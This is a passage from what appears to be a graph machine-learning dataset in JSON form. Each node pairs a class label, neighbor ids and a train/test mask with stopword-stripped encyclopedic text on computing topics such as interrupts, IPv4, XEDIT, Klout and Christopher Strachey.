broadcasting unit national anthem ba ba black sheep mood researchers university canterbury christchurch restored acetate master disc 2016 results may heard soundcloud may 1952 strachey gave two-part talk study control animals machines cybernetics bbc home service science survey programme strachey worked national research development corporation nrdc 1952 1959 working st. lawrence seaway project able visit several computer centres united states catalogue instruction sets later worked programming elliott 401 computer ferranti pegasus computer together donald b. gillies filed 3 patents computing design including design base registers program relocation also worked analysis vibration aircraft working briefly roger penrose developed concept time-sharing 1959 strachey left nrdc become computer consultant working nrdc emi ferranti organisations number wide-ranging projects work included logical design computers providing autocode later design high-level programming languages contract produce autocode ferranti orion computer strachey hired peter landin became one assistant duration strachey consulting period 1962 remaining consultant accepted position cambridge university 1965 strachey accepted position oxford university first director programming research group later university first professor computer science fellow wolfson college oxford collaborated dana scott strachey elected distinguished fellow british computer society 1971 pioneering work computer science 1973 strachey along robert milne began write essay submitted adams prize competition continued work revising book form strachey seen heard recorded lighthill debate ai see lighthill report strachey contracted illness diagnosed jaundice period seeming recovery returned died infectious hepatitis 18 may 1975 developed combined programming language cpl influential set lecture notes fundamental concepts programming languages formalised distinction l- r- values seen c programming language strachey also coined term currying although invent underlying concept instrumental design ferranti pegasus computer macro language m4 derives much strachey gpm general purpose macrogenerator one earliest macro expansion languages department computer science university oxford christopher strachey professorship computing currently held samson abramsky frs november 2016 strachey 100 event held oxford university celebrate centenary strachey birth including viewing weston library oxford christopher strachey archive held bodleian library collection",
    "neighbors": [
      5510,
      11020,
      5783,
      9497,
      3737,
      2585,
      1947,
      8879,
      5683,
      11574,
      3767,
      1982,
      11075,
      8262,
      5585,
      9047,
      10729,
      2283,
      9330,
      372,
      1783,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5457,
    "label": 3,
    "text": "Interrupt:interrupt system programming interrupt signal processor emitted hardware software indicating event needs immediate attention interrupt alerts processor high-priority condition requiring interruption current code processor executing processor responds suspending current activities saving state executing function called interrupt handler interrupt service routine isr deal event interruption temporary interrupt handler finishes unless handling interrupt emitted fatal error processor resumes normal activities two types interrupts hardware interrupts software interrupts softirqs hardware interrupts used devices communicate require attention operating system. bare-metal program running cpu oses internally hardware interrupts implemented using electronic alerting signals sent processor external device either part computer disk controller external peripheral example pressing key keyboard moving mouse triggers hardware interrupts cause processor read keystroke mouse position unlike software type described hardware interrupts asynchronous occur middle instruction execution requiring additional care programming act initiating hardware interrupt referred interrupt request irq different devices usually associated different interrupts using unique value associated interrupt makes possible know hardware device caused interrupts interrupt values often called irq lines interrupt lines software interrupts also called exceptions unlike interrupts exceptions occur synchronously respect processor clock sometimes referred synchronous interrupts software interrupt caused either exceptional condition processor special instruction instruction set causes interrupt executed former often called trap exception used errors events occurring program execution exceptional enough handled within program example divide-by-zero exception thrown processor arithmetic logic unit commanded divide number zero instruction error impossible operating system catch exception decide usually aborting process displaying error message software interrupt instructions function similarly subroutine calls used variety purposes request services device drivers like interrupts sent disk controller request reading writing data disk interrupt interrupt handler number hardware interrupts limited number interrupt request irq lines processor may hundreds different software interrupts interrupts commonly used technique computer multitasking especially real-time computing system said interrupt-driven interrupts similar signals difference signals used inter-process communication ipc mediated kernel possibly via system calls handled processes interrupts mediated processor handled kernel kernel may pass interrupt signal process caused typical examples sigsegv sigbus sigill sigfpe hardware interrupts introduced optimization eliminating unproductive waiting time polling loops waiting external events first system use approach dyseac completed 1954 although earlier systems provided error trap functions interrupts may implemented hardware distinct component control lines may integrated memory subsystem implemented hardware distinct component interrupt controller circuit ibm pc programmable interrupt controller pic may connected interrupting device processor interrupt pin multiplex several sources interrupt onto one two cpu lines typically available implemented part memory controller interrupts mapped system memory address space interrupts categorized different types processors typically internal interrupt mask allows software ignore external hardware interrupts set setting clearing mask may faster accessing interrupt mask register imr pic disabling interrupts device cases x86 architecture disabling enabling interrupts processor act memory barrier however may actually slower interrupt leaves machine well-defined state called precise interrupt interrupt four properties interrupt meet requirements called imprecise interrupt phenomenon overall system performance severely hindered excessive amounts processing time spent handling interrupts called interrupt storm univac 1103 computer generally credited earliest use interrupts 1953 earlier univac 1951 arithmetic overflow either triggered execution two-instruction fix-up routine address 0 programmer option caused computer stop ibm 650 1954 incorporated first occurrence interrupt masking national bureau standards dyseac 1954 first use interrupts i/o ibm 704 first use interrupts debugging transfer trap could invoke special routine branch instruction encountered.the mit lincoln laboratory tx-2 system 1957 first provide multiple levels priority interrupts level-triggered interrupt interrupt signaled maintaining interrupt line high low logic level device wishing signal level-triggered interrupt drives interrupt request line active level high low holds level serviced ceases asserting line cpu commands otherwise handles condition caused signal interrupt typically processor samples interrupt input predefined times bus cycle state t2 z80 microprocessor interrupt n't active processor samples cpu n't see one possible use type interrupt minimize spurious signals noisy interrupt line spurious pulse often short noticed multiple devices may share level-triggered interrupt line designed interrupt line must pull-down pull-up resistor actively driven settles inactive state devices actively assert line indicate outstanding interrupt let line float actively drive signaling interrupt line asserted state one one sharing devices signaling outstanding interrupt level-triggered interrupts favored easy share interrupt request line without losing interrupts multiple shared devices interrupt time upon detecting assertion interrupt line cpu must search devices sharing interrupt request line one triggered interrupt detected servicing device cpu may recheck interrupt line status determine whether devices also need service line de-asserted cpu avoids checking remaining devices line since devices interrupt frequently others device interrupts particularly expensive careful ordering device checks employed increase efficiency original pci standard mandated level-triggered interrupts advantage sharing interrupts also serious problems sharing level-triggered interrupts long device line outstanding request service line remains asserted possible detect change status device deferring servicing low-priority device option would prevent detection service requests higher-priority devices device line cpu know service interrupt device permanently blocks interrupts devices edge-triggered interrupt interrupt signaled level transition interrupt line either falling edge high low rising edge low high device wishing signal interrupt drives pulse onto line releases line inactive state pulse short detected polled i/o special hardware may required detect multiple devices may share edge-triggered interrupt line designed interrupt line must pull-down pull-up resistor actively driven settles inactive state default sate devices signal interrupt briefly driving line non-default state let line float actively drive signaling interrupt type connection also referred open collector line carries pulses generated devices analogous pull cord buses trolleys passenger pull signal driver requesting stop however interrupt pulses different devices may merge occur close time avoid losing interrupts cpu must trigger trailing edge pulse e.g rising edge line pulled driven low detecting interrupt cpu must check devices service requirements edge-triggered interrupts suffer problems level-triggered interrupts sharing service low-priority device postponed arbitrarily interrupts high-priority devices continue received get serviced device cpu know service may raise spurious interrupts wo n't interfere interrupt signaling devices however easy edge-triggered interrupt missed example interrupts masked period unless type hardware latch records event impossible recover problem caused many lockups early computer hardware processor know expected something modern hardware often one interrupt status registers latch interrupts requests well-written edge-driven interrupt handling code check registers ensure events missed elderly industry standard architecture isa bus uses edge-triggered interrupts without mandating devices able share irq lines mainstream isa motherboards include pull-up resistors irq lines well-behaved isa devices sharing irq lines work fine parallel port also uses edge-triggered interrupts many older devices assume exclusive use irq lines making electrically unsafe share 3 ways multiple devices sharing line raised first exclusive conduction switching exclusive connection pins next bus connected line listening cards bus must know talk talk ie isa bus talking triggered two ways accumulation latch logic gates logic gates expect continual data flow monitored key signals accumulators trigger remote side excites gate beyond threshold thus negotiated speed required speed versus distance advantages trigger generally method excitation detected rising edge falling edge threshold oscilloscope trigger wide variety shapes conditions triggering software interrupts must built software os app c app trigger table table functions header app os know use appropriately related hardware however confuse hardware interrupts signal cpu cpu enacts software table functions similarly software interrupts systems use hybrid level-triggered edge-triggered signaling hardware looks edge also verifies interrupt signal stays active certain period time common use hybrid interrupt nmi non-maskable interrupt input nmis generally signal major – even catastrophic – system events good implementation signal tries ensure interrupt valid verifying remains active period time 2-step approach helps eliminate false interrupts affecting system message-signaled interrupt use physical interrupt line instead device signals request service sending short message communications medium typically computer bus message might type reserved interrupts might pre-existing type memory write message-signalled interrupts behave much like edge-triggered interrupts interrupt momentary signal rather continuous condition interrupt-handling software treats two much manner typically multiple pending message-signaled interrupts message virtual interrupt line allowed merge closely spaced edge-triggered interrupts merge message-signalled interrupt vectors shared extent underlying communication medium shared additional effort required identity interrupt indicated pattern data bits requiring separate physical conductor many distinct interrupts efficiently handled reduces need sharing interrupt messages also passed serial bus requiring additional lines pci express serial computer bus uses message-signaled interrupts exclusively push button analogy applied computer systems term doorbell doorbell interrupt often used describe mechanism whereby software system signal notify computer hardware device work done typically software system place data well-known mutually agreed upon memory location ring doorbell writing different memory location different memory location often called doorbell region may even multiple doorbells serving different purposes region act writing doorbell region memory rings bell notifies hardware device data ready waiting hardware device would know data valid acted upon would typically write data hard disk drive send network encrypt etc term doorbell interrupt usually misnomer similar interrupt causes work done device however doorbell region sometimes implemented polled region sometimes doorbell region writes physical device registers sometimes doorbell region hardwired directly physical device registers either writing directly physical device registers may cause real interrupt occur device central processor unit cpu one doorbell interrupts compared message signaled interrupts similarities multiple devices sharing interrupt line triggering style act spurious interrupt sources respect many devices one line workload servicing interrupts grows proportion square number devices therefore preferred spread devices evenly across available interrupt lines shortage interrupt lines problem older system designs interrupt lines distinct physical conductors message-signaled interrupts interrupt line virtual favored new system architectures pci express relieve problem considerable extent devices poorly designed programming interface provide way determine whether requested service may lock otherwise misbehave serviced want devices tolerate spurious interrupts also tolerate sharing interrupt line isa cards due often cheap design construction notorious problem devices becoming much rarer hardware logic becomes cheaper new system architectures mandate shareable interrupts interrupts provide low overhead good latency low load degrade significantly high interrupt rate unless care taken prevent several pathologies various forms livelocks system spends time processing interrupts exclusion required tasks extreme conditions large number interrupts like high network traffic may completely stall system avoid problems operating system must schedule network interrupt handling carefully schedules process execution multi-core processors additional performance improvements interrupt handling achieved receive-side scaling rss multiqueue nics used nics provide multiple receive queues associated separate interrupts routing interrupts different cores processing interrupt requests triggered network traffic received single nic distributed among multiple cores distribution interrupts among cores performed automatically operating system routing interrupts usually referred irq affinity manually configured purely software-based implementation receiving traffic distribution known receive packet steering rps distributes received traffic among cores later data path part interrupt handler functionality advantages rps rss include requirements specific hardware advanced traffic distribution filters reduced rate interrupts produced nic downside rps increases rate inter-processor interrupts ipis receive flow steering rfs takes software-based approach accounting application locality performance improvements achieved processing interrupt requests cores particular network packets consumed targeted application typical uses interrupts include following system timers disk i/o power-off signals traps interrupts exist transfer data bytes using uarts ethernet sense key-presses control motors anything else equipment must another typical use generate periodic interrupts dividing output crystal oscillator interrupt handler count interrupts order processor keep time periodic interrupts often used os task scheduler reschedule priorities running processes older computers generated periodic interrupts power line frequency controlled utilities eliminate long-term drift electric clocks example disk interrupt signals completion data transfer disk peripheral process waiting read write file starts another example power-off interrupt predicts requests loss power allowing computer equipment perform orderly shut-down also interrupts used typeahead features buffering events like keystrokes interrupts used allow emulation instructions unimplemented certain models computer line example floating point instructions may implemented hardware systems emulated lower-cost systems execution unimplemented instruction cause interrupt operating system interrupt handler recognize occurrence unimplemented instruction interpret instruction software routine return interrupting program instruction executed provides application software portability across entire line",
    "neighbors": [
      2560,
      518,
      3594,
      6155,
      9739,
      2574,
      6675,
      7187,
      10776,
      25,
      10267,
      8732,
      4637,
      1058,
      4643,
      6180,
      9762,
      5158,
      6187,
      3630,
      7217,
      10803,
      9784,
      8761,
      10809,
      7739,
      8767,
      576,
      2625,
      9791,
      7235,
      3148,
      6221,
      3157,
      4695,
      3160,
      602,
      2653,
      10333,
      97,
      11363,
      7269,
      9829,
      6760,
      10344,
      8298,
      9835,
      10856,
      5744,
      7281,
      3699,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      1660,
      3197,
      1150,
      639,
      5247,
      11390,
      2179,
      10883,
      3211,
      10891,
      6797,
      10382,
      1170,
      659,
      6806,
      663,
      1176,
      2201,
      6296,
      7323,
      9366,
      7325,
      9370,
      9882,
      9887,
      4773,
      7335,
      2729,
      7853,
      8879,
      2224,
      3248,
      178,
      2226,
      9907,
      6837,
      7349,
      7863,
      11447,
      6329,
      8889,
      9402,
      5823,
      5312,
      4803,
      8388,
      7879,
      1736,
      2248,
      3272,
      9928,
      9932,
      5840,
      7382,
      8410,
      9436,
      3294,
      1247,
      11489,
      5348,
      1253,
      5862,
      7403,
      9964,
      1776,
      242,
      5363,
      5368,
      9466,
      2811,
      9468,
      1278,
      1791,
      10499,
      780,
      1804,
      8972,
      10508,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      7445,
      792,
      10016,
      292,
      10533,
      8487,
      10235,
      2345,
      11564,
      4909,
      7471,
      7983,
      2355,
      7477,
      8501,
      823,
      9525,
      4409,
      10040,
      6459,
      7483,
      9020,
      7999,
      11075,
      10052,
      4423,
      2379,
      5452,
      1869,
      6988,
      7501,
      9547,
      11601,
      7507,
      7511,
      5976,
      4441,
      9563,
      10590,
      3426,
      869,
      6501,
      8551,
      5484,
      7020,
      6510,
      4465,
      11634,
      11123,
      5492,
      2933,
      11635,
      376,
      1915,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      1933,
      8078,
      7057,
      9105,
      11667,
      6037,
      5529,
      11675,
      8092,
      2462,
      5022,
      6558,
      421,
      1445,
      935,
      9638,
      4521,
      9643,
      2476,
      4525,
      6063,
      11184,
      7601,
      2994,
      8625,
      5044,
      7604,
      10676,
      9655,
      6075,
      6078,
      9151,
      6596,
      11204,
      11205,
      10183,
      4040,
      8136,
      9166,
      9171,
      9685,
      9686,
      4569,
      2523,
      477,
      5598,
      2529,
      2019,
      10730,
      10731,
      8687,
      6128,
      5105,
      5617,
      499,
      5619,
      5115,
      6652,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5458,
    "label": 3,
    "text": "World_Cup_Soccer:_Italia_'90:world cup soccer italia '90 world cup soccer italia '90 football video game released various home computers 1990 virgin mastertronic officially licensed game tournament known simply italia '90 tronix budget reissues different games also released virgin mastertronic sega consoles world cup italia '90 second licensed game based fifa world cup featuring official logo mascot first ill-fated world cup carnival 1986 fifa world cup game based 1989 game world trophy soccer originally arcade game mastertronic amiga-based arcadia machines virgin games bought mastertronic 1988 game released amiga atari st commodore 64 published virgin mastertronic virgin mastertronic obtained official licence world cup sponsor olivetti adapted world trophy soccer game renaming world cup soccer italia '90 also porting amstrad cpc dos zx spectrum attempts made change set tournament teams available match actual 1990 world cup game presented bird's-eye view player gets near goal switches 3d view penalty area player must try score defender arrives screen player choose play england belgium italy spain teams correct coloured strips tournament actual world cup game received mixed reviews amiga action gave overall score 62 reviewers split reviewer alex said graphics well implemented impressed use first-person perspective shooting saving goal reviewer doug concluded 've played fair share soccer games world cup tie-in certainly best game quite hard get hang even get used controls game still n't play well zzap gave scores 44 amiga version 42 commodore 64 praise given graphics review overwhelmingly negative complaints focusing 3d goalmouth section said n't really work unfair anyway mostly despite officially licensed game accurately reflect tournament someone tell world cup may official licence lacks official fixtures teams game became best seller number one selling spectrum game august september 1990 also unofficial italia '90 games including italy 1990 published u.s. gold released official games 1986 1994 tournaments italy '90 soccer released italy 1988 italia 1990 budget publisher codemasters",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5459,
    "label": 5,
    "text": "John_Romkey:john romkey john romkey donald w. gillies developed first industry tcp/ip stack ibm pc 1983 founding ftp software commercial tcp/ip stack provider 1986 romkey authored first network analyzer netwatch predating network general sniffer served iab simon hackett connected first appliance toaster internet romkey currently owner blue forest research consulting company mit john romkey authored first tcp/ip stack ms-dos founder ftp software company provided commercial package ms-dos ms windows advent microsoft tcp/ip stacks starting windows 95 ftp software well commercial tcp/ip stacks providers driven business",
    "neighbors": [
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 5460,
    "label": 9,
    "text": "Service_Data_Objects:service data objects service data objects technology allows heterogeneous data accessed uniform way sdo specification originally developed 2004 joint collaboration oracle bea ibm approved java community process jsr 235 version 2.0 specification introduced november 2005 key part service component architecture originally technology known web data objects wdo shipped ibm websphere application server 5.1 ibm websphere studio application developer 5.1.2 similar technologies jdo emf jaxb ado.net service data objects denote use language-agnostic data structures facilitate communication structural tiers various service-providing entities require use tree structure root node provide traversal mechanisms breadth/depth-first allow client programs navigate elements objects static fixed number fields dynamic map-like structure allowing unlimited fields specification defines meta-data fields object graph also provided change summaries allow receiving programs act efficiently specification developed ibm rogue wave oracle sap siebel sybase xcalia software ag within oasis member section open csa since april 2007 collaborative work materials remain collaboration platform open soa informal group actors industry following sdo products available open source implementations sdo specification versions history found",
    "neighbors": [
      4960,
      3710,
      11339,
      6860,
      3853,
      9263,
      9467,
      10193,
      4979,
      5210,
      3323,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 5461,
    "label": 8,
    "text": "Klout:klout klout website mobile app used social media analytics rate users according online social influence via klout score numerical value 1 100 determining user score klout measured size user social media network correlated content created measure users interact content klout launched 2008 lithium technologies acquired site march 2014 closed service may 25 2018 klout used bing facebook foursquare google+ instagram linkedin twitter youtube wikipedia data create klout user profiles assigned unique klout score klout scores ranged 1 100 higher scores corresponding higher ranking breadth strength one online social influence twitter users assigned score users registered klout could link multiple social networks network data aggregated influence user klout score klout measured influence using data points twitter following count follower count retweets list memberships many spam/dead accounts following influential people retweet unique mentions information combined data number social network followings interactions come klout score social networks influenced user klout score twitter facebook google+ linkedin individuals pages corporate/business youtube instagram klout well wikipedia accounts flickr blogger tumblr last.fm wordpress bing also linked users however weigh klout score microsoft announced strategic investment klout september 2012 whereby bing would access klout influence technology klout would access bing search data scoring algorithm klout scores supplemented three nominally specific measures klout calls true reach amplification network impact true reach based size user engaged audience actively engage user messages amplification score relates likelihood one messages generate actions retweets mentions likes comments network impact reflects computed influence value person engaged audience primary business model klout involved companies paying klout perks campaigns company offers free services products klout users match pre-defined set criteria including scores topics geographic locations klout users receive perks obligation write hope effectively advertise products social media klout offered perks program since 2010 according klout ceo joe fernandez 50 partnerships established november 2011 may 2013 klout announced users claimed 1 million perks across 400 campaigns march 2013 klout announced intention begin displaying business analytics aimed helping business brand users learn online audiences september 2012 klout announced information-sharing partnership bing search engine showing klout scores bing searches allowing klout users post items selected bing social media several objections klout methodology raised regarding process scores generated overall societal effect critics pointed klout scores representative influence person really highlighted barack obama president united states lower influence score number bloggers social critics argued klout score devalued authentic online communication promoted social ranking stratification trying quantify human interaction klout attempted address criticisms updated algorithms barack obama importance better reflected site criticized violating privacy minors exploiting users profit john scalzi described principle behind klout operation socially evil exploitation users status anxiety charles stross described service internet equivalent herpes blogging analysis klout terms conditions revealed company business model illegal united kingdom conflicted data protection act 1998 stross advised readers delete klout accounts opt klout services ben rothke concluded klout work cut seems like need beta longer klout applauded trying measure monstrosity called social influence results influence truth carry little influence klout criticised opacity methodology claimed advanced machine learning techniques used leveraging network theory sean golliher analysed klout scores twitter users found simple logarithm number followers sufficient explain 95 variance november 2015 klout released academic paper discussing methodology ieee bigdata 2015 conference spite controversy employers made hiring decisions based klout scores reported article wired man recruited vp position fifteen years experience consulting companies including america online ford kraft eliminated candidate specifically klout score time 34 favour candidate score 67",
    "neighbors": [
      10629,
      9901,
      5133,
      3510,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 5462,
    "label": 7,
    "text": "Death_Star_(ILM):death star ilm death star name render farm owned industrial light magic ilm cluster computer originally built sgi since converted linux system built racksaver verari systems amd processors system originally 1,500 processors 750 nodes figure doubled ilm tends quiet supercomputer current configuration known",
    "neighbors": [
      10051,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5463,
    "label": 2,
    "text": "XEDIT:xedit xedit visual editor vm/cms using block mode ibm 3270 terminals line-mode terminals also supported xedit much line-oriented modern pc unix editors example xedit supports automatic line numbers many commands operate blocks lines pair features allows selective line column editing command example hides lines matching described pattern col column command allows hiding columns specified hence changing example word appears columns 24 thru 28 yes lines word flexible doable another feature command line allows user type arbitrary editor commands ibm 3270 terminals transmit data computer certain special keys pressed program function key pfk program access key pak xedit less interactive many pc unix editors example continuous spell-checking user types problematic notable features screen layout xedit macros scripts written rexx exec 2 exec xedit exposes majority internal state macro environment allowing macros easily read set internal variables control operation kedit 5 dos os/2 supports external rexx interpreter native os/2 rexx quercus rexx dos quercus rexx replacing older mansfield rexx rather limited kexx subset keditw 1.6.1 windows supports internal kexx 5.62 version rexx language macros arranged codice_1 file format xedit written ibm employee xavier de lamberterie first released 1980 predecessor edit sp sp initialism system product used ibm key influences edit older editor cms edgar ibm program product editor cms xedit supported many edgar commands sos screen output simulation major one xedit also supported exec 2 predecessor rexx pcs unix computers began supplant ibm 3270 terminals users wanted text editors resembled xedit accustomed fill need several developers provided similar programs kedit mansfield software group inc. first xedit clone although originally released 1983 first major release version 3.53 dos released 1985 1990 kedit 4.0 version supporting os/2 included command last version dos os/2 kedit 5.0p4 keditw windows version 1.6.1 dated december 2012 earlier windows versions kedit 1.6 supports syntax highlighting various languages including c cobol fortran html java pascal xbase defined codice_2 file format kedit supports built-in rexx-subset called kexx mansfield software created first non-ibm implementation rexx personal rexx 1985 december 2012 mansfield software released 1.6.1 provide compatibility windows 8 extended support least june 32bit versions work also 64bit versions windows 7 vista directly support unicode may 2018 kedit supports windows 10 mansfield promised website support least end 2018 email support least june 2019 sedit first released 1989 another implementation windows unix supports variant rexx language called s/rexx announced 1994 hessling editor written compatibility kedit xedit mind uses regina open source version rexx begun 1990 first released august 1992 also built several implementations rexx including uni-rexx",
    "neighbors": [
      3430,
      8524,
      909,
      5677,
      7217,
      6706,
      4979,
      5492,
      7188,
      3960,
      3323,
      8509,
      3358
    ],
    "mask": "None"
  },
  {
    "node_id": 5464,
    "label": 9,
    "text": "Monica_S._Lam:monica s. lam monica sin-ling lam professor computer science department stanford founder moka5 omlet monica lam received b.sc university british columbia 1980 ph.d. computer science carnegie mellon university 1987 lam joined faculty computer science stanford university 1988 contributed research wide range computer systems topics including compilers program analysis operating systems security computer architecture high-performance computing currently directs mobisocial laboratory stanford lam cofounder ceo omlet first mobisocial product launched 2014 omlet open decentralized social networking tool based extensible chat platform collective project research group developed concept livepc subscribers livepc automatically run latest published pc virtual images reboot approach allows computers managed scalably securely 2005 group started company called mokafive transfer technology industry another research project program analysis group developed collection tools improving software security reliability developed first scalable context-sensitive inclusion-based pointer analysis freely available tool called bddbddb allows programmers express context-sensitive analyses simply writing datalog queries tools developed include griffin static dynamic analysis finding security vulnerabilities web applications sql injection static dynamic program query language called pql static memory leak detector called clouseau dynamic buffer overrun detector called cred dynamic error diagnosis tool called diduce previously lam led suif stanford university intermediate format compiler project produced widely used compiler infrastructure known locality optimizations interprocedural parallelization many compiler techniques developed adopted industry research projects included architecture compiler cmu warp machine systolic array vliw processors stanford dash distributed shared memory machine 1998 took sabbatical leave stanford help start tensilica inc. company specializes configurable processor cores lam chaired acm sigplan programming languages design implementation conference 2000 served editorial board acm transactions computer systems numerous program committees conferences languages compilers pldi popl operating systems sosp computer architecture asplos isca lam received following awards honors",
    "neighbors": [
      1952,
      899,
      7428,
      7942,
      5418,
      9002,
      2316,
      3468,
      9932,
      4435,
      1783,
      2264,
      9368,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5465,
    "label": 2,
    "text": "User_Interface_Privilege_Isolation:user interface privilege isolation user interface privilege isolation uipi technology introduced windows vista windows server 2008 combat shatter attack exploits making use mandatory integrity control prevents processes lower integrity level il sending messages higher il processes except specific set ui messages window messages designed communicate user action processes however used run arbitrary code receiving process context used malicious low il process run arbitrary code context higher il process constitutes unauthorized privilege escalation restricting access vectors code execution data injection uipi mitigate kinds attacks uipi mandatory integrity control generally security feature security boundary ui accessibility applications allowed bypass uipi setting uiaccess value true part manifest file however flag honored windows uipi application must installed program files windows directory application must signed valid code signing authority install application either locations requires least user local administrator privilege running elevated process high integrity level thus malware trying move position bypass uipi must microsoft office 2010 uses uipi protected view sandbox prohibit potentially unsafe documents modifying components files resources system",
    "neighbors": [
      517,
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      5682,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      1113,
      603,
      9819,
      3170,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      10036,
      10039,
      11572,
      6972,
      11584,
      3394,
      3922,
      4439,
      2402,
      2919,
      4458,
      6506,
      4972,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      2027,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 5466,
    "label": 9,
    "text": "Manifest_expression:manifest expression manifest expression programming language construct compiler analyse deduce values take without execute program information enable compiler optimizations particular loop nest optimization parallelization data dependency analysis expression called manifest computed outer loop counters constants formal definition given control flow loop condition regulated manifest expressions called manifest loop resp condition practical applications manifest expressions also require expression integral affine stepwise affine variables manifest expression compile time computable function depends manifest variable reference defined variable reference single unambiguous definition particularly relevant procedural languages pointer analysis and/or data flow analysis required find expression defines variable value several defining expressions possible e.g variable assigned condition variable reference manifest",
    "neighbors": [
      1952,
      6160,
      10013,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 5467,
    "label": 2,
    "text": "Huawei_EMUI:huawei emui huawei emui formerly known emotion ui custom mobile operating system based android huawei uses huawei honor-branded smartphone devices 30 december 2012 huawei introduced emotion ui 1.0 based android 4.0 features voice assistant app chinese customizable homescreens theme-switching company rolled installation files ascend p1 website company claims “ probably world ’ emotional system ” 4 september 2014 company announced emui 3.0 along ascend mate 7 pre-ifa event berlin user interface ever since called emui instead emotion ui features new app store china markets late 2015 huawei launched emui 4.0 redesigned interface based android 6.0 along huawei mate 8 2016 emui 5.0 introduced huawei mate 9 2017 rom images removed official website huawei says provide convenient satisfactory update service since users must rely over-the-air ota updates late 2017 emui 8.0 launched skipping emui 6.0 7.0 combine android versions along huawei mate 10 release emphasises different ai-capabilities huawei unveiled emui 9.0 german consumer electronics exhibition ifa 2018 version emui based android pie new features improvements include new gesture navigation system moving many features bottom screen easier one-handed use reorganized settings page digital balance dashboard gpu turbo 2.0 performance improvements etc update version named emui 9.1 released june 2019 new features improvements include gpu turbo 3.0 new file system called extendable read-only file system erofs file sharing feature onehop huawei vlog improvements new ar features etc emui 10 based android q announced 9 august 2019 huawei developer conference 2019 beta version emui 10 set released 8 september 2019 first coming huawei p30 p30 pro flagship smartphones new features improvements include system-wide dark mode redesigned camera app new emui logo new system font permission control changes introduced android q tweaks animations etc",
    "neighbors": [
      5637,
      8719,
      3600,
      11282,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      10303,
      7234,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      97,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5363,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      7483,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      5067,
      2001,
      479,
      1516,
      5100,
      5613,
      499,
      5620,
      11252,
      8698,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5468,
    "label": 5,
    "text": "Ucspi-tcp:ucspi-tcp ucspi-tcp public domain unix tcp command-line tool building tcp client-server applications consists super-server tcpserver tcpclient application life qmail dave sill 2 january 2006 appendix b.3 ucspi-tcp acronym unix client-server program interface tcp pronounced ooks-pie tee see pee tcpserver features built-in tcp wrapper-like access control",
    "neighbors": [
      10436,
      1988,
      10924,
      4369,
      5492,
      4349
    ],
    "mask": "Test"
  },
  {
    "node_id": 5469,
    "label": 5,
    "text": "IPv4:ipv4 internet protocol version 4 ipv4 fourth version internet protocol ip one core protocols standards-based internetworking methods internet packet-switched networks ipv4 first version deployed production arpanet 1983 still routes internet traffic today despite ongoing deployment successor protocol ipv6 ipv4 described ietf publication rfc 791 september 1981 replacing earlier definition rfc 760 january 1980 ipv4 uses 32-bit address space limits number unique hosts 4,294,967,296 2 large blocks reserved special networking methods internet protocol protocol defines enables internetworking internet layer internet protocol suite essence forms internet uses logical addressing system performs routing forwarding packets source host next router one hop closer intended destination host another network ipv4 connectionless protocol operates best effort delivery model guarantee delivery assure proper sequencing avoidance duplicate delivery aspects including data integrity addressed upper layer transport protocol transmission control protocol tcp ipv4 uses 32-bit addresses limits address space 2 addresses ipv4 reserves special address blocks private networks ~18 million addresses multicast addresses ~270 million addresses ipv4 addresses may represented notation expressing 32-bit integer value often written dot-decimal notation consists four octets address expressed individually decimal numbers separated periods example quad-dotted ip address 192.0.2.235 represents 32-bit decimal number 3221226219 hexadecimal format 0xc00002eb may also expressed dotted hex format 0xc0.0x00.0x02.0xeb octal byte values 0300.0000.0002.0353 cidr notation combines address routing prefix compact format address followed slash character count consecutive 1 bits routing prefix subnet mask address format common use classful networking practiced example loopback address host 127.0.0.1 commonly written 127.1 given belonged class-a network eight bits network mask 24 bits host number original design ipv4 ip address divided two parts network identifier significant octet address host identifier rest address latter also called rest field structure permitted maximum 256 network identifiers quickly found inadequate overcome limit most-significant address octet redefined 1981 create network classes system later became known classful networking revised system defined five classes classes b c different bit lengths network identification rest address used previously identify host within network different sizes fields different classes network class different capacity addressing hosts addition three classes addressing hosts class defined multicast addressing class e reserved future applications dividing existing classful networks subnets began 1985 publication division made flexible introduction variable-length subnet masks vlsm 1987 1993 based work 